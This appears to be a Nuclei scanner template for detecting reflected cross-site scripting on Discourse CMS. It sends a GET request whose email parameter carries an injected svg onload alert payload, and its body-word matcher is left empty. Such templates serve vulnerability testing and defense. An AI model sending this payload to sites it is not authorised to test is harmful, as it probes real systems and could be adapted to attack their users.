id: discourse-xss info: name: Discourse CMS - XSS author: madrobot severity: medium description: Cross-site scripting (XSS) on Discourse CMS requests: - method: GET path: - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(1337)%3E' matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "" part: body